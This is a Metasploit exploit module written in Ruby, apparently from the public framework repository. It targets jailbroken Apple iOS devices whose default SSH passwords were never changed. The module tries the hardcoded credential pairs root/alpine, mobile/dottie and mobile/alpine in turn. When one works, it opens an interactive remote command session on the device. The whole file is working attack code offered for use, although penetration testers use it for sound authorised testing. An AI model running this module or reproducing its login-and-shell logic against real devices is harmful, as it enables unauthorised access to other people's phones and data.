1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'net/ssh'
7
require 'net/ssh/command_stream'
8

9
class MetasploitModule < Msf::Exploit::Remote
10
  Rank = ExcellentRanking
11

12
  include Msf::Exploit::Remote::SSH
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Apple iOS Default SSH Password Vulnerability',
19
        'Description' => %q{
20
          This module exploits the default credentials of Apple iOS when it
21
          has been jailbroken and the passwords for the 'root' and 'mobile'
22
          users have not been changed.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'hdm'
27
        ],
28
        'References' => [
29
          ['OSVDB', '61284'],
30
          ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
31
        ],
32
        'DefaultOptions' => {
33
          'EXITFUNC' => 'thread'
34
        },
35
        'Payload' => {
36
          'Compat' => {
37
            'PayloadType' => 'cmd_interact',
38
            'ConnectionType' => 'find'
39
          }
40
        },
41
        'Platform' => 'unix',
42
        'Arch' => ARCH_CMD,
43
        'Targets' => [
44
          ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ], ['mobile', 'alpine'] ] } ],
45
        ],
46
        'Privileged' => true,
47
        'DisclosureDate' => '2007-07-02',
48
        'DefaultTarget' => 0,
49
        'Notes' => {
50
          'Stability' => [CRASH_SAFE],
51
          'Reliability' => [REPEATABLE_SESSION],
52
          'SideEffects' => []
53
        }
54
      )
55
    )
56

57
    register_options(
58
      [
59
        Opt::RHOST(),
60
        Opt::RPORT(22)
61
      ], self.class
62
    )
63

64
    register_advanced_options(
65
      [
66
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
67
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
68
      ]
69
    )
70
  end
71

72
  def post_auth?
73
    true
74
  end
75

76
  def rhost
77
    datastore['RHOST']
78
  end
79

80
  def rport
81
    datastore['RPORT']
82
  end
83

84
  def do_login(user, pass)
85
    opts = ssh_client_defaults.merge({
86
      auth_methods: ['password', 'keyboard-interactive'],
87
      port: rport,
88
      password: pass
89
    })
90

91
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
92

93
    begin
94
      ssh = nil
95
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
96
        ssh = Net::SSH.start(rhost, user, opts)
97
      end
98
    rescue Rex::ConnectionError
99
      return
100
    rescue Net::SSH::Disconnect, ::EOFError
101
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
102
      return
103
    rescue ::Timeout::Error
104
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
105
      return
106
    rescue Net::SSH::AuthenticationFailed
107
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
108
    rescue Net::SSH::Exception => e
109
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
110
      return
111
    end
112

113
    if ssh
114
      conn = Net::SSH::CommandStream.new(ssh, logger: self)
115
      ssh = nil
116
      return conn
117
    end
118

119
    return nil
120
  end
121

122
  def exploit
123
    target['accounts'].each do |info|
124
      user, pass = info
125
      print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
126
      conn = do_login(user, pass)
127
      next unless conn
128

129
      print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
130
      handler(conn.lsock)
131
      break
132
    end
133
  end
134
end
135

136